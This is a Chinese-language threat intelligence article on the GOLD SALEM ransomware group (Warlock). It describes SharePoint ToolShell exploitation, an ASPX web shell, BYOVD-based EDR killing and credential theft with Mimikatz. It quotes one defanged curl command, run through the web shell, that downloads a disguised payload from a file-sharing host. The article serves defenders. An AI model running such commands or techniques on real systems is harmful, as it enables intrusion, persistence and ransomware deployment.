随着“黄金塞勒姆”(一个也被称为“术士集团”的新威胁行为者组织)自2025年3月以来一直在积极入侵企业网络,网络威胁格局中又出现了一个复杂的勒索软件攻击行动。
这个新兴的勒索软件团伙成功攻击了北美、欧洲和南美洲的60个组织,在部署其定制的“Warlock”勒索软件有效载荷时展现出了娴熟的攻击技巧。
微软已将该组织追踪为Storm-2603,并中度确信其在中国开展活动,不过归属问题仍无定论。
GOLD SALEM通过瞄准从小型商业实体到大型跨国公司的各类受害者,在竞争激烈的勒索软件生态系统中占据了战略性地位。
该团伙通过复杂的双重勒索模式运作,利用一个基于Tor的数据泄露网站,在勒索要求未得到满足时发布窃取的受害者数据。
他们对受害者的选择似乎具有战略性,很大程度上避开了中国和俄罗斯的目标,不过值得注意的是,他们在2025年9月将一家俄罗斯发电服务公司列入了名单,这表明其可能在传统勒索软件避风港之外开展活动。
这些威胁行为者于2025年6月通过地下论坛首次公开露面,他们在RAMP论坛上发帖,征集针对Veeam、ESXi和SharePoint等企业应用程序的漏洞利用方法,同时寻找能够禁用端点检测和响应系统的工具。
Sophos的分析师发现了该组织复杂的运营安全措施,并注意到他们在招募初始访问中介,这表明该组织要么具备直接入侵能力,要么正在开发勒索软件即服务模式。
GOLD SALEM的运营基础设施展现出先进的规划和技术成熟度。
该组织为每名受害者设置了倒计时器,通常会给12至14天的时间用于支付赎金,之后才会公布数据。
截至2025年9月,他们声称已将45%受害者的数据出售给私人买家,不过这些数字可能为了造成心理影响而被夸大了。
该组织的数据泄露网站呈现出专业的展示和受害者分类,这体现了他们对操作专业性的执着。
高级规避技术与安全绕过方法
技术分析揭示了GOLD SALEM在绕过安全解决方案和获取持久网络访问方面的复杂手段。
该组织利用ToolShell漏洞链针对SharePoint服务器进行初始网络入侵,其利用了一系列关键漏洞,包括CVE-2025-49704、CVE-2025-49706、CVE-2025-53770和CVE-2025-53771。
成功利用后,他们会部署一个ASPX网页后门,该后门在IIS工作进程上下文中为cmd[.]exe创建进程对象,从而实现具有输出可见性的远程命令执行。
观察到的一种尤其值得注意的技术涉及到他们通过网页外壳执行命令:
curl - L - o c:\\users\\public\\Sophos\\Sophos-UI[.]exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks[.]exe[.]txt该命令会下载一个基于Golang的WebSocket服务器,建立独立于初始Web外壳的持久访问。
该团伙通过自带易受攻击驱动程序(BYOVD)技术展现出先进的规避能力,他们利用重命名的百度杀毒软件易受攻击驱动程序(googleApiUtil64.sys)来利用CVE-2024-51324漏洞实现任意进程终止,尤其针对终端检测与响应(EDR)代理。
他们的工具包包括用于从LSASS内存中提取凭据的Mimikatz、用于横向移动的PsExec和Impacket,以及用于在网络端点部署勒索软件的组策略对象滥用手段。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
